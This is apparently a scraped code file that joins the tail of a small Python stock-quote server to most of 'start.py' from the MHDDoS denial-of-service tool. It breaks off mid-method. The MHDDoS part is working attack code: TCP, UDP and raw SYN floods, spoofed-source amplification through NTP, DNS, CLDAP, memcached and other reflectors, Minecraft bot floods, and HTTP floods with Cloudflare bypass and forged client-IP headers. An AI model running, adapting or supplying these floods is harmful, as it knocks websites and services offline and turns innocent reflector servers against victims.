            else:
                yield t, bids, asks
    @property
    def _current_book_2(self):
        # Same pacing logic as _current_book_1, for the DEF stock.
        for t, bids, asks in self._data_2:
            if REALTIME:
                while t > self._sim_start + (datetime.now() - self._rt_start):
                    yield t, bids, asks
            else:
                yield t, bids, asks
    def read_10_first_lines(self):
        # Skip the first ten book states of each stock.
        for _ in xrange(10):
            self._data_1.next()
            self._data_2.next()
    @route('/query')
    def handle_query(self, x):
        """ Takes no arguments, and yields the current top of the book; the
        best bid and ask and their sizes
        """
        try:
            t1, bids1, asks1 = self._current_book_1.next()
            t2, bids2, asks2 = self._current_book_2.next()
        except Exception as e:
            # Data stream exhausted (or errored): rebuild all app state and retry.
            print "error getting stocks...reinitalizing app"
            self.__init__()
            t1, bids1, asks1 = self._current_book_1.next()
            t2, bids2, asks2 = self._current_book_2.next()
        # Report the later of the two simulated timestamps.
        t = t1 if t1 > t2 else t2
        print 'Query received @ t%s' % t
        # Empty books yield falsy top_bid/top_ask values rather than dicts.
        return [{
            'id': x and x.get('id', None),
            'stock': 'ABC',
            'timestamp': str(t),
            'top_bid': bids1 and {
                'price': bids1[0][0],
                'size': bids1[0][1]
            },
            'top_ask': asks1 and {
                'price': asks1[0][0],
                'size': asks1[0][1]
            }
        },
        {
            'id': x and x.get('id', None),
            'stock': 'DEF',
            'timestamp': str(t),
            'top_bid': bids2 and {
                'price': bids2[0][0],
                'size': bids2[0][1]
            },
            'top_ask': asks2 and {
                'price': asks2[0][0],
                'size': asks2[0][1]
            }
        }]
################################################################################
#
# Main
if __name__ == '__main__':
    # Generate the order-history fixture on first run, then serve it.
    if not os.path.isfile('test.csv'):
        print "No data found, generating..."
        generate_csv()
    run(App())
|
start.py | #!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from random import choice as randchoice
from random import randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get
from yarl import URL
# Shared log format for all MHDDoS output.
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
            datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
# TLS context with hostname checks and certificate verification disabled,
# so HTTPS targets with invalid/self-signed certificates still connect.
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
# Cached public IP of this machine; filled lazily by getMyIPAddress().
__ip__: Any = None
def getMyIPAddress():
    """Return this host's public IP address as a string, caching it in __ip__.

    Providers are tried in order and the first successful answer wins;
    individual failures are silently skipped. Returns None when every
    provider fails. (The original recursed indefinitely in that case, let
    later providers clobber earlier successes, and cached a regex Match
    object instead of a string for the pattern-based providers.)
    """
    global __ip__
    if __ip__:
        return __ip__
    providers = (
        lambda: get('https://api.my-ip.io/ip', timeout=.1).text,
        lambda: get('https://ipwhois.app/json/', timeout=.1).json()["ip"],
        lambda: get('https://ipinfo.io/json', timeout=.1).json()["ip"],
        # .group(0) extracts the matched text — a bare Match is not a str.
        lambda: ProxyTools.Patterns.IP.search(
            get('http://checkip.dyndns.org/', timeout=.1).text).group(0),
        lambda: ProxyTools.Patterns.IP.search(
            get('https://spaceiran.com/myip/', timeout=.1).text).group(0),
        lambda: get('https://ip.42.pl/raw', timeout=.1).text,
    )
    for fetch in providers:
        with suppress(Exception):
            __ip__ = fetch()
        if __ip__:
            return __ip__
    return __ip__
def exit(*message):
    """Log *message* parts (joined by spaces) as an error when given, flush
    the logging machinery, and terminate with exit status 1.

    Note: shadows the builtin ``exit``.
    """
    if message:
        logger.error(" ".join(message))
    shutdown()
    _exit(1)
class Methods:
    """Registry of supported attack method names, split by OSI layer."""
    # Application-layer (HTTP and scraper based) methods.
    LAYER7_METHODS: Set[str] = {
        "CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
        "NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
        "APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
    }
    # Transport-layer (TCP/UDP/raw-socket, incl. amplification) methods.
    LAYER4_METHODS: Set[str] = {
        "TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
        "CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
        "CLDAP"
    }
    # Union of both layers.
    ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
# Googlebot-style User-Agent strings; randchoice()'d by the BOT flood method.
# NOTE(review): the first entry spells "Mozila" — runtime data, left
# untouched here; confirm whether the typo is intentional.
google_agents = [
    "Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
    "like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
    "+http://www.google.com/bot.html)) "
    "Googlebot/2.1 (+http://www.google.com/bot.html)",
    "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter(object):
    """Integer counter stored in a multiprocessing RawValue ('i')."""

    def __init__(self, value=0):
        self._value = RawValue('i', value)

    def __iadd__(self, value):
        # Read-modify-write on the shared int (no locking, like the original).
        updated = self._value.value + value
        self._value.value = updated
        return self

    def __int__(self):
        return self._value.value

    def set(self, value):
        # Overwrite the stored value and return self so calls can chain.
        self._value.value = value
        return self
# Global traffic statistics, updated by Tools.send / Tools.sendto.
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
    """Formatting helpers plus socket-send wrappers that maintain the
    global traffic counters."""

    @staticmethod
    def humanbytes(i: int, binary: bool = False, precision: int = 2):
        """Render a byte count like '1.50 kB' ('2.00 kiB' when *binary*)."""
        units = [
            "B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
        ]
        if i <= 0:
            # Zero/negative counts get a placeholder.
            return "-- B"
        base = 1024 if binary else 1000
        exponent = trunc(log2(i) / log2(base))
        scaled = i / pow(base, exponent)
        unit = units[exponent].format("i" if binary else "")
        return f"{scaled:.{precision}f} {unit}"

    @staticmethod
    def humanformat(num: int, precision: int = 2):
        """Render a count like '1.50k'; values <= 999 are returned unchanged."""
        suffixes = ['', 'k', 'm', 'g', 't', 'p']
        if num <= 999:
            return num
        magnitude = sum(abs(num / 1000.0 ** x) >= 1
                        for x in range(1, len(suffixes)))
        return f'{num / 1000.0 ** magnitude:.{precision}f}{suffixes[magnitude]}'

    @staticmethod
    def sizeOfRequest(res: Response) -> int:
        """Approximate on-wire request size (method + url + headers) for *res*."""
        headers = '\r\n'.join(f'{key}: {value}'
                              for key, value in res.request.headers.items())
        return len(res.request.method) + len(res.request.url) + len(headers)

    @staticmethod
    def randchr(lengh: int) -> str:
        """Random string of *lengh* code points in [0, 1000], stripped."""
        chars = [chr(randint(0, 1000)) for _ in range(lengh)]
        return "".join(chars).strip()

    @staticmethod
    def send(sock: socket, packet: bytes):
        """send() wrapper: bumps the global counters; False when nothing was sent."""
        global BYTES_SEND, REQUESTS_SENT
        if not sock.send(packet):
            return False
        BYTES_SEND += len(packet)
        REQUESTS_SENT += 1
        return True

    @staticmethod
    def sendto(sock, packet, target):
        """sendto() wrapper: bumps the global counters; False when nothing was sent."""
        global BYTES_SEND, REQUESTS_SENT
        if not sock.sendto(packet, target):
            return False
        BYTES_SEND += len(packet)
        REQUESTS_SENT += 1
        return True

    @staticmethod
    def safe_close(sock=None):
        """Close *sock* when it is truthy; no-op for None."""
        if sock:
            sock.close()
class Minecraft:
    """Builders for raw Minecraft protocol packets (VarInt length framing)."""

    @staticmethod
    def varint(d: int) -> bytes:
        """Encode *d* as a VarInt: 7 payload bits per byte, MSB = continuation."""
        encoded = b''
        while True:
            low7 = d & 0x7F
            d >>= 7
            encoded += data_pack("B", low7 | (0x80 if d > 0 else 0))
            if d == 0:
                break
        return encoded

    @staticmethod
    def data(*payload: bytes) -> bytes:
        """Concatenate *payload* chunks and prefix with the VarInt length."""
        body = b''.join(payload)
        return Minecraft.varint(len(body)) + body

    @staticmethod
    def short(integer: int) -> bytes:
        """Encode an unsigned big-endian 16-bit integer."""
        return data_pack('>H', integer)

    @staticmethod
    def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
        """Build a handshake packet for *target* = (host, port)."""
        host, port = target
        return Minecraft.data(Minecraft.varint(0x00),
                              Minecraft.varint(version),
                              Minecraft.data(host.encode()),
                              Minecraft.short(port),
                              Minecraft.varint(state))

    @staticmethod
    def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
        """Handshake whose host field also carries a client ip and uuid,
        NUL-separated (proxy-forwarding style)."""
        host, port = target
        forwarded_host = Minecraft.data(host.encode(),
                                        b"\x00",
                                        ip.encode(),
                                        b"\x00",
                                        uuid.hex.encode())
        return Minecraft.data(Minecraft.varint(0x00),
                              Minecraft.varint(version),
                              forwarded_host,
                              Minecraft.short(port),
                              Minecraft.varint(state))

    @staticmethod
    def login(username: str) -> bytes:
        """Build a login packet for *username* (str or bytes)."""
        if isinstance(username, str):
            username = username.encode()
        return Minecraft.data(Minecraft.varint(0x00),
                              Minecraft.data(username))

    @staticmethod
    def keepalive(num_id: int) -> bytes:
        """Build a keep-alive packet carrying *num_id*."""
        return Minecraft.data(Minecraft.varint(0x00),
                              Minecraft.varint(num_id))

    @staticmethod
    def chat(message: str) -> bytes:
        """Build a chat packet carrying *message*."""
        return Minecraft.data(Minecraft.varint(0x01),
                              Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
    """One transport-layer flood worker thread.

    select() binds SENT_FLOOD to the chosen method's implementation; run()
    then calls it in a loop while the shared sync event stays set.
    """
    _method: str
    _target: Tuple[str, int]
    _ref: Any
    SENT_FLOOD: Any
    # NOTE(review): class attribute holds the cycle *function* itself; it is
    # replaced by a real cycle(...) instance in __init__ / select().
    _amp_payloads = cycle
    _proxies: List[Proxy] = None
    def __init__(self,
                 target: Tuple[str, int],
                 ref: List[str] = None,
                 method: str = "TCP",
                 synevent: Event = None,
                 proxies: Set[Proxy] = None):
        Thread.__init__(self, daemon=True)
        self._amp_payload = None
        self._amp_payloads = cycle([])
        self._ref = ref
        self._method = method
        self._target = target
        self._synevent = synevent
        if proxies:
            self._proxies = list(proxies)
    def run(self) -> None:
        # Wait for the coordinated start signal, then flood until it clears.
        if self._synevent: self._synevent.wait()
        self.select(self._method)
        while self._synevent.is_set():
            self.SENT_FLOOD()
    def open_connection(self,
                        conn_type=AF_INET,
                        sock_type=SOCK_STREAM,
                        proto_type=IPPROTO_TCP):
        """Open a socket to the target, via a random proxy when configured."""
        if self._proxies:
            s = randchoice(self._proxies).open_socket(
                conn_type, sock_type, proto_type)
        else:
            s = socket(conn_type, sock_type, proto_type)
        s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
        s.connect(self._target)
        return s
    def select(self, name):
        """Bind SENT_FLOOD to the implementation for *name* (default TCP).

        Amplification methods also set a (probe-bytes, port) payload and
        pre-build one raw packet per reflector in self._ref.
        """
        self.SENT_FLOOD = self.TCP
        if name == "UDP": self.SENT_FLOOD = self.UDP
        if name == "SYN": self.SENT_FLOOD = self.SYN
        if name == "VSE": self.SENT_FLOOD = self.VSE
        if name == "TS3": self.SENT_FLOOD = self.TS3
        if name == "MCPE": self.SENT_FLOOD = self.MCPE
        if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
        if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
        if name == "CPS": self.SENT_FLOOD = self.CPS
        if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
        if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
        if name == "RDP":
            self._amp_payload = (
                b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
                3389)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
        if name == "CLDAP":
            self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
                                 b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
        if name == "MEM":
            self._amp_payload = (
                b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
        if name == "CHAR":
            self._amp_payload = (b'\x01', 19)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
        if name == "ARD":
            self._amp_payload = (b'\x00\x14\x00\x00', 3283)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
        if name == "NTP":
            self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
        if name == "DNS":
            self._amp_payload = (
                b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
                b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
            self.SENT_FLOOD = self.AMP
            self._amp_payloads = cycle(self._generate_amp())
    def TCP(self) -> None:
        """Stream random 1 KiB blocks over one TCP connection until it drops."""
        # safe_close handles both exit paths: s stays None if the connect
        # raised; the with-block already closed it otherwise.
        s = None
        with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
            while Tools.send(s, randbytes(1024)):
                continue
        Tools.safe_close(s)
    def MINECRAFT(self) -> None:
        """Repeatedly send a status handshake plus ping over one connection."""
        handshake = Minecraft.handshake(self._target, 74, 1)
        ping = Minecraft.data(b'\x00')
        s = None
        with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
            while Tools.send(s, handshake):
                Tools.send(s, ping)
        Tools.safe_close(s)
    def CPS(self) -> None:
        """Connections-per-second: open a connection, count it, close it."""
        global REQUESTS_SENT
        s = None
        with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
            REQUESTS_SENT += 1
        Tools.safe_close(s)
    def alive_connection(self) -> None:
        """Hold one connection open, draining it byte by byte."""
        s = None
        with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
            while s.recv(1):
                continue
        Tools.safe_close(s)
    def CONNECTION(self) -> None:
        """Spawn a thread that keeps a connection alive; count the attempt."""
        global REQUESTS_SENT
        with suppress(Exception):
            Thread(target=self.alive_connection).start()
            REQUESTS_SENT += 1
    def UDP(self) -> None:
        """Send random 1 KiB UDP datagrams at the target."""
        s = None
        with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
            while Tools.sendto(s, randbytes(1024), self._target):
                continue
        Tools.safe_close(s)
    def SYN(self) -> None:
        """Send a pre-built raw SYN packet in a loop (requires raw sockets)."""
        payload = self._genrate_syn()
        s = None
        with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
            # We supply the IP header ourselves.
            s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
            while Tools.sendto(s, payload, self._target):
                continue
        Tools.safe_close(s)
    def AMP(self) -> None:
        """Send pre-built reflector packets, rotating through _amp_payloads."""
        payload = next(self._amp_payloads)
        s = None
        with suppress(Exception), socket(AF_INET, SOCK_RAW,
                                         IPPROTO_UDP) as s:
            s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
            # payload is (raw_packet, (reflector_ip, port)).
            while Tools.sendto(s, *payload):
                continue
        Tools.safe_close(s)
    def MCBOT(self) -> None:
        """Log a fake Minecraft client in, then keep-alive/chat forever."""
        s = None
        with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
            Tools.send(s, Minecraft.handshake_forwarded(self._target,
                                                        47,
                                                        2,
                                                        ProxyTools.Random.rand_ipv4(),
                                                        uuid4()))
            Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
            sleep(1.5)
            # Send a chat message every 360 keep-alives.
            c = 360
            while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))):
                c -= 1
                if c:
                    continue
                c = 360
                Tools.send(s, Minecraft.chat(Tools.randchr(100)))
        Tools.safe_close(s)
    def VSE(self) -> None:
        """Loop a fixed "Source Engine Query" UDP probe at the target."""
        # NOTE(review): the global statement is unused here — the counters
        # are updated inside Tools.sendto.
        global BYTES_SEND, REQUESTS_SENT
        payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
                   b'\x20\x51\x75\x65\x72\x79\x00')
        with socket(AF_INET, SOCK_DGRAM) as s:
            while Tools.sendto(s, payload, self._target):
                continue
        Tools.safe_close(s)
    def FIVEM(self) -> None:
        """Loop a fixed "getinfo" UDP probe at the target."""
        global BYTES_SEND, REQUESTS_SENT
        payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
        with socket(AF_INET, SOCK_DGRAM) as s:
            while Tools.sendto(s, payload, self._target):
                continue
        Tools.safe_close(s)
    def TS3(self) -> None:
        """Loop a fixed UDP probe at the target."""
        global BYTES_SEND, REQUESTS_SENT
        payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
        with socket(AF_INET, SOCK_DGRAM) as s:
            while Tools.sendto(s, payload, self._target):
                continue
        Tools.safe_close(s)
    def MCPE(self) -> None:
        """Loop a fixed UDP payload at the target."""
        global BYTES_SEND, REQUESTS_SENT
        payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
                   b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
                   b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
                   b'\x73')
        with socket(AF_INET, SOCK_DGRAM) as s:
            while Tools.sendto(s, payload, self._target):
                continue
        Tools.safe_close(s)
    def _genrate_syn(self) -> bytes:
        """Build one raw IP/TCP SYN packet from our IP to the target."""
        ip: IP = IP()
        ip.set_ip_src(getMyIPAddress())
        ip.set_ip_dst(self._target[0])
        tcp: TCP = TCP()
        tcp.set_SYN()
        tcp.set_th_dport(self._target[1])
        tcp.set_th_sport(randint(1, 65535))
        ip.contains(tcp)
        return ip.get_packet()
    def _generate_amp(self):
        """Build one spoofed UDP probe per reflector in self._ref.

        Source address is the target, so replies hit the target instead
        of us; returns (raw_packet, (reflector, port)) tuples.
        """
        payloads = []
        for ref in self._ref:
            ip: IP = IP()
            ip.set_ip_src(self._target[0])
            ip.set_ip_dst(ref)
            ud: UDP = UDP()
            ud.set_uh_dport(self._amp_payload[1])
            ud.set_uh_sport(self._target[1])
            ud.contains(Data(self._amp_payload[0]))
            ip.contains(ud)
            payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
        return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(randint(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: str | bytes = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: str | bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
